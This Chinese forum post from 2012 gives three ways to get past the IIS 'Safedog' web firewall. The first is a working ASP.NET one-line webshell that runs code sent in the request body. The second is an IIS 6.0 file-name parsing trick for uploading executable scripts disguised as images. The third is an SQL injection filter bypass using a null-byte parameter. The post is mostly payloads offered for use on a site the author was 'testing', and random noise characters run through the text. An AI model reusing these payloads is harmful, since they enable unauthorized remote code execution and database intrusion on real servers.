1、绕过IIS安全狗的一句话。0 a- }4 ?- A$ Z$ z2 s
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。: S0 N. U+ n! y: R
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
. F' S8 [9 I3 R% F7 ]+ ~1 \ ~9 M8 p/ [& c& d& Z4 R
2、IIS6.0解析漏洞遇到安全狗。
( C6 }: ~/ C& L9 F3 n文件名为' I( J& E7 G3 F
http://www.xxxxx.com/sh3llc0de.asp;1.jpg1 T# L: ~2 f$ B# H
- s7 n& O; b. k* i9 j2 o; U这样的会被IIS安全狗果断屏蔽。: ?# ?4 T% r7 h; T+ h5 S
改成如下名称,IIS6一样会解析:6 L0 M1 ~0 x! r2 f
www.xxxxx.com/;1.asp;1.jpg
3 v& w1 n. Y9 K
0 N9 `3 h; E8 @# c3、安全狗的注入绕过。2 e+ ^7 d5 M3 F- C9 @: Q y- u
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。- [# V s' M# E$ e+ M5 |
但如果:7 {) F. |$ ]& c8 Z! p, Q5 ~5 N
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
2 l: F$ @* n0 L; m' B就可以成功绕过了。
% L1 M& O1 a; a$ o/ c
, ~ U& _' O% y0 u" j; D+ l; O; X9 i" M# g2 n
|
发表于 2012-10-31 08:25:30
收藏
支持
反对